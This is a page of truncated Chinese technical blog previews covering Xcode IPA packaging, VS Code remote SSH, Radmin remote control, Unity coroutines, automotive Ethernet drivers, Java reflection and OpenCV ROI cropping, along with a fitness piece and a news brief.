目 录 第1章 绪论 5 1.1 选题的依据及意义 5 1.2 国内外现状研究 6 1.3 研究目的 6 第2章 设计技术与开发环境 7 2.1 相关技术介绍 7 2.1.1 JSP简介 7 2.1.2 B/S模式分析 8 2.1.3 mysql简介 9 2.2 开发环境介绍 9 2.2.1 Myeclipse简介 9 2…

魔镜魔镜告诉我,如何挑选靠谱的硬件方案!

随着传统健身房半胁迫顾客进行数万元的预售、办卡后&#xff0c;分分钟遁地跑路的新闻已经在大家心中留下了深深的烙印&#xff0c;再加上良莠不齐的教练、器材质量、永远无法抢到的健身课、以及办卡之后就被“打入冷宫”……可真是苦了每一个无处安放的运动灵魂啊&#xff01;…

XCODE14生成的APP制作成IPA

1.用XCODE14生成Archives存档包 2.在Finder中显示 3.显示包内容 4.双击进入Products 5.双击进入Applications 6.复制生成的.App文件到Playload文件夹 压缩Playload文件夹成zip 重命名zip为ipa 在弹出 的 提示中 选择 Use .ipa 重命名IPA文件为自己的命名

【vscode】SSH连接远程服务器Host/容器

目录 1. 连接远程服务器 1.1 确保远程服务器Host上ssh打开 1.2 本地主机 1.2.1 安装ssh-client 1.2.2 安装vscode插件 1.2.3 通过密钥完成身份认证 1.2.4 SSH连接配置 2. Python代码跳转 3. C代码跳转 4. Git 历史记录 5. 连接远程服务器上的Docker容器&#xff08;易…

radmin远程控制软件怎么样,有没有替代品

Radmin 是流行的、屡获殊荣的安全远程控制软件&#xff0c;它使您能够在远程计算机上实时工作&#xff0c;就像使用它自己的键盘和鼠标一样。 您可以从多个地方远程访问同一台计算机&#xff0c;是网络和管理类别中流行的远程桌面工具。 Radmin 是外国软件&#xff0c;在国内使…

Unity协程和线程的区别深入理解(附实验展示)

Unity协程和线程的区别附实验展示写在前面协程、进程、线程的概念进程与线程的区别协程与线程的区别实验1&#xff1a;协程中执行普通函数实验2&#xff1a;协程中开启另一个协程实验3&#xff1a;协程中开启WWW请求实验4&#xff1a;一个脚本中多个协程访问临界资源实验5&…

车载以太网基础篇之Eth Driver

车载以太网基础篇之Ethernet Driver前言 首先&#xff0c;请问大家几个小小问题&#xff0c;你清楚&#xff1a; 你知道Eth Driver模块的主要作用是什么吗&#xff1f;EthDriver与以太网控制器&#xff0c;以太网收发器&#xff0c;都有哪些关系呢&#xff1f;Eth Driver的常…

java虚拟机反射机制

&#xff08;1&#xff09;Java虚拟机反射机制的定义&#xff1f; Java反射机制是在运行状态中&#xff0c;对于任意一个类&#xff0c;都能够知道这个类的所有属性和方法;对于任意一个对象&#xff0c;都能够调用它的任意方法和属性;这种动态获取信息以及动态调用对象方法的功…

苍穹最终一致性使用

适用场景 最终一致模式可以保证跨数据库或跨节点更新时的数据一致。它会以1个更新操作为基准&#xff0c;注册多个其它更新操作&#xff0c;最终保证所有更新都成功&#xff0c;实现分布式事务的弱一致性。可以适用一个更新适用多个场景(跨云、跨库、跨系统) 工作原理 1、在第…

4月17日第壹简报,星期一,农历闰二月廿七

4月17日第壹简报&#xff0c;星期一&#xff0c;农历闰二月廿七坚持阅读&#xff0c;静待花开1. 风云三号G星顺利入轨&#xff01;我国成功发射首颗主动降水测量卫星&#xff08;能探测到毛毛雨般的降水&#xff09;。2. 四次出舱&#xff01;神舟十五号乘组刷新单个乘组出舱活…

Opencv c++ 图片截取不规则ROI区域

做目标检测的很多时候&#xff0c;需要我们选择一个相对固定的区域来识别目标。 思路很简单&#xff0c;适合相机固定&#xff0c;ROI变化不大的场景。 1、原图备份后先截取不规则的ROI区域&#xff0c;其他区域置为黑背景&#xff0c;检测识别效果 2、在原图上&#xff0c;将…